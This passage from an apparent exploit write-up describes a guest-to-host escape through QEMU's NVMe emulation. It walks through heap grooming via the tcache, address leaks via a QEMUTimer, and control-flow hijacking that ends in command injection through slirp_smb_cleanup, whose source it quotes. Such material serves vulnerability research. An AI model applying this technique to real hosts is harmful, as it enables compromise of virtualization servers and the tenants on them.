table, filled with physmap address 39 | 3. Free the mapping table, putting it in head of the tcache freelist 40 | 41 | 4. Malloc a **NvmeRequest** structure, trigger the vulnerable bug, then the chunk in userspace will be added into Qemu's tcache freelist 42 | 5. Now the chunk in userspace seems like a state of free in host, but Qemu's guest still has R/W capability. 43 | 44 | ### 0x03 Find an information leak 45 | 46 | 1. Malloc a mapping table again, the alloced chunk will be shared between host and guest 47 | 48 | 2. Initialize the table, then we get the physmap address 49 | 3. Heap fengshui again, create a new **sq** and place a **QEMUTimer** in userspace 50 | 4. Initialize the timer, then we get the Qemu address and Heap address 51 | 52 | ### 0x04 Hijack the control flow 53 | 54 | 1. Modify the cb to system address 55 | 2. Modify the opaque to our arguments address. 56 | 3. Run the timer, Control RIP! 57 | 58 | 59 | ### Tips 60 | 61 | Note that executing the system function directly will cause QEMU to fork a new process, resulting in the removal of the mapping space of guest memory. Therefore, we can consider copying the commands of guest space to QEMU main process, and controlling rip to slirp_smb_cleanup function. Then the command is copied to the RDI register, followed by a command injection to complete the command execution. 62 | 63 | ```c 64 | static void slirp_smb_cleanup(SlirpState *s) 65 | { 66 | int ret; 67 | 68 | if (s->smb_dir) { 69 | gchar *cmd = g_strdup_printf("rm -rf %s", s->smb_dir); // Control RIP to here. 70 | ret = system(cmd); 71 | if (ret == -1 || !WIFEXITED(ret)) { 72 | error_report("'%s' failed.", cmd); 73 | } else if (WEXITSTATUS(ret)) { 74 | error_report("'%s' failed. Error code: %d", 75 | cmd, WEXITSTATUS(ret)); 76 | } 77 | g_free(cmd); 78 | g_free(s->smb_dir); 79 | s->smb_dir = NULL; 80 | } 81 | } 82 | ``` 83 | --------------------------------------------------------------------------------